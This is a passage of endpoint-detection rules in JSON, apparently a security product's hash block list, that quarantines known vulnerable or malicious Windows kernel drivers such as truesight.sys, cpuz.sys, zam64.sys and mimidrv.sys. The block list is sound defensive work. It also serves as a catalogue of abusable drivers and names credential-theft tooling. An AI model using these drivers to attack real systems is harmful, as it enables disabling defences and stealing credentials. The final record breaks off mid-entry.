"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473059Z", + "creation_date": "2026-03-23T11:45:31.473062Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473070Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ccff824db4c41ee922e8f65035b198ae0d5a28861b3d1cf184a15bc90487ad6a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1720f4d-13c4-50de-b21a-d2ef141ca899", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472124Z", + "creation_date": "2026-03-23T11:45:30.472127Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ac1af529c9491644f1bda63267e0f0f35e30ab0c98ab1aecf4571f4190ab9db4", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e17b7f53-a818-54b0-aff3-0eaf76c8b300", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971821Z", + "creation_date": "2026-03-23T11:45:29.971823Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971828Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af7b9e3dca8fd4f9eb548bd06cf9f14dbce9f947fc375064aa90b47e7ee8940c", + "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e181caf6-5a5d-5f43-9fd8-212e8d61d575", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141664Z", + "creation_date": "2026-03-23T11:45:31.141665Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7415b025a04d7c655815c27eff2c449ff2a88a2ed8ebede11ba705c87f5b6cbc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e18986d9-c37b-5317-a517-5819d5e8fd66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971282Z", + "creation_date": "2026-03-23T11:45:29.971286Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971294Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45f42c5d874369d6be270ea27a5511efcca512aeac7977f83a51b7c4dee6b5ef", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] 
[https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1b17f61-2b1f-518e-9f81-cb0ece8062b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469629Z", + "creation_date": "2026-03-23T11:45:30.469632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f18cb98188952eb08367adc1c6810e4b1c3902240fdcb15efa0ffb1b69a5f98", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1b75aa4-8796-5d9e-86d1-ed431c9ef5c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621246Z", + "creation_date": "2026-03-23T11:45:29.621248Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621253Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e", + "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1c9ff54-3610-5e58-bf7a-e7cf920d45de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489213Z", + "creation_date": "2026-03-23T11:45:31.489215Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489221Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ec994d3d1963e5ae76bee42edcb54357370e218c41a07851bf13ec0a3220d7f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1d37d52-0fea-5be7-bf93-50410832e083", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831677Z", + "creation_date": "2026-03-23T11:45:30.831679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831684Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e7da30faa89f8c902845f7907295541eb3d2f5d9f1a7cda6456255cfd3b3789", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1d46c39-3d2c-5fa3-a204-d1b72091b370", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830861Z", + "creation_date": "2026-03-23T11:45:30.830863Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830880Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ceeff1bc2380597228991c7ac8f03a3106822e7fc93548ed0b48706355743e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1d61157-e381-54d7-b5da-0a6ca49dca2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499641Z", + "creation_date": "2026-03-23T11:45:31.499644Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7c2281f2a8c6b76a815a9e3ee68a3b4fcf0deaead3bf5c9784d6d75eae77135", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1e083b0-ba0e-59ce-8224-8af614b2fc4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465654Z", + "creation_date": "2026-03-23T11:45:30.465657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465666Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e858de280bd72d7538386a73e579580a6d5edba87b66b3671dc180229368be19", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1e1bf18-0874-54c4-b85a-472a4b53fa62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499188Z", + "creation_date": "2026-03-23T11:45:31.499191Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499200Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33a4755218bbe461ac13eb2adb2b32042afca0f6f357134624210e7e2a9ee30c", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e1f13007-332b-5996-b722-8d8a9d141a93", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478216Z", + "creation_date": "2026-03-23T11:45:31.478220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b2c503e6bed4a29973c7b27888a52216ee90a3db54aa9cd2ecabee04c028063", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e2085497-e760-5e9f-956a-243fd4a471b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473125Z", + "creation_date": "2026-03-23T11:45:30.473129Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc8cb3aebe911bd9b4a3caf46f7dda0f73fec4d2e4e7bc9601bb6726f5893091", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e208ebb8-e51d-501b-b1ca-e32bf84d4d7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824404Z", + "creation_date": "2026-03-23T11:45:31.824408Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824417Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80f3535ebfa3f9448baa7074386872e8db8fad71da7fa7ef79a0a3ddf694f982", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e20df849-eb71-5be5-9ff7-a8514093e184", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146117Z", + "creation_date": "2026-03-23T11:45:32.146120Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146125Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d06688123a9251aeb76ac8dad2af956566e2f1051550988611c7623dbebb3d3", + "comment": "Vulnerable Kernel Driver (aka neofltr.sys) [https://www.loldrivers.io/drivers/c44e6197-efab-49d2-8a5f-04ae4a0f0ea0/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e234e327-12e7-5f8c-92a1-5e1210e296fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980340Z", + "creation_date": "2026-03-23T11:45:29.980342Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.980348Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2665d3127ddd9411af38a255787a4e2483d720aa021be8d6418e071da52ed266", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e239108c-8623-5317-99f7-0fdedc38ac1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819019Z", + "creation_date": "2026-03-23T11:45:30.819021Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40ebdd21c93146a92536688a230801791a86e2bec2719896a3d629ad930e9f17", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e23f6eac-0453-5211-916d-4ccddfbe0a01", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495417Z", + "creation_date": "2026-03-23T11:45:31.495420Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f76f5b988cdf003d62c75db7a866a88ff266485bf74e51492134d83b94a9bce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e247529f-ff12-51f9-ac92-07683f3159b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613224Z", + "creation_date": "2026-03-23T11:45:29.613226Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613232Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"a7c6f397f1fb230627bb537e1cf59283be04d17d050a384661e00aba6877b145", + "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e2514b33-6230-55f6-bed3-d4f3581fb251", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462984Z", + "creation_date": "2026-03-23T11:45:30.462988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462997Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a85d3fd59bb492a290552e5124bfe3f9e26a3086d69d42ccc44737b5a66673ec", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e253c5e3-dbf2-50c5-9eec-ea5270254fa8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819209Z", + "creation_date": "2026-03-23T11:45:30.819211Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819216Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db0bcfb5bbd93abc8682508af224a1aa5e96f82f037ee0ba26d1d02a3d639a2a", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e267c3eb-213d-53fd-8ab4-02e1ca348d21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828596Z", + "creation_date": "2026-03-23T11:45:30.828598Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "41de3c49f4f1a68015cafad2d26e52a94ad84c6115ca8a3a6f30f694501166c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e26c5a57-f487-591b-806b-95b6365e7509", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815815Z", + "creation_date": "2026-03-23T11:45:31.815817Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a9da4966af33f53ca136ed1e329183d4920e8bb6c0d5e78bbe0ef318b110ac54", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver 